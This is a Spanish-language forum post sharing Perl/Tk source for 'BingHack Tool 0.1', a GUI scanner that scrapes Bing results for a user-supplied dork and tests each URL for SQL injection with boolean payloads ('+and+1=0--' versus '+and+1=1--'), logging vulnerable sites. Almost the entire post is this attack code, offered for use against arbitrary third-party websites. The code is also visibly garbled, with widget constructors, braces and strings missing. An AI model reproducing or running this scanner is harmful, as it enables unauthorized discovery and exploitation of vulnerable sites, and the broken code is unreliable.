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[Perl Tk] BingHack Tool 0.1

Autor Tema: [Perl Tk] BingHack Tool 0.1  (Leído 997 veces)

Desconectado Doddy

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[Perl Tk] BingHack Tool 0.1
« en: Mayo 26, 2012, 03:59:39 pm »
Version Tk de un script en Perl para buscar paginas vulnerables a SQLi usando Bing.

Una imagen

El codigo

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#BingHack Tool 0.1
#Version Tk
#Coded By Doddy H

use Tk;
use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv: Gecko/20080201Firefox/"

my $color_fondo = "black";
my $color_texto = "green";

if ( $^O eq 'MSWin32' ) {
    use Win32::Console;

my $hj =
  MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
$hj->resizable( 0, 0 );
$hj->title("BingHack Tool 0.1");

    -text       => "Dork : ",
    -font       => "Impact1",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 18, -y => 22 );
my $dork = $hj->Entry(
    -width      => 30,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 68, -y => 26 );

    -text       => "Pages : ",
    -font       => "Impact1",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 270, -y => 22 );
my $pages = $hj->Entry(
    -width      => 10,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 335, -y => 26 );

    -text             => "Search",
    -width            => 10,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto,
    -command          => \&search
)->place( -x => 420, -y => 26 );
    -text             => "Logs",
    -width            => 10,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto,
    -command          => \&logs
)->place( -x => 495, -y => 26 );

    -text       => "Links Found",
    -font       => "Impact",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 110, -y => 80 );
my $links = $hj->Listbox(
    -width      => 40,
    -height     => 10,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 30, -y => 120 );

    -text       => "SQLi Found",
    -font       => "Impact",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 390, -y => 80 );
my $founds = $hj->Listbox(
    -width      => 40,
    -height     => 10,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 310, -y => 120 );


sub search {

    $links->delete( "0.0", "end" );
    $founds->delete( "0.0", "end" );

    $hj->title("BingHack Tool 0.1 [+] Status : Searching");
    my @urls = bing( $dork->get, $pages->get );

    for (@urls) {
        $links->insert( "end", $_ );

    $hj->title("BingHack Tool 0.1 [+] Status : Scanning");

    for my $pa (@urls) {
    $hj->title("BingHack Tool 0.1");

sub logs {

    my $file = "sql-logs.txt";

    if ( -f $file ) {
    else {
            -title            => "Error",
            -buttons          => ["OK"],
            -text             => "Logs not found",
            -background       => $color_fondo,
            -foreground       => $color_text,
            -activebackground => $color_text

sub sql {
    my ( $pass1, $pass2 ) = ( "+", "--" );
    my $page = shift;

    my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
    my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );

    unless ( $testar1 eq $testar2 ) {
        $founds->insert( "end", $page );
        savefile( "sql-logs.txt", $page );

sub savefile {
    open( SAVE, ">>" . $_[0] );
    print SAVE $_[1] . "\n";
    close SAVE;

sub bing {

    my ( $a, $b ) = @_;
    for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
        my $code =
          toma( "" . $a . "&first=" . $pages );

        while ( $code =~ /<h3><a href="(.*?)"/mig ) {
            push( @founds, $1 );
    my @founds = repes( cortar(@founds) );
    return @founds;

sub repes {
    my @limpio;
    foreach $test (@_) {
        push @limpio, $test unless $repe{$test}++;
    return @limpio;

sub cortar {
    my @nuevo;
    for (@_) {
        if ( $_ =~ /=/ ) {
            @tengo = split( "=", $_ );
            push( @nuevo, @tengo[0] . "=" );
        else {
            push( @nuevo, $_ );
    return @nuevo;

sub toma {
    return $nave->get( $_[0] )->content;

#The End ?
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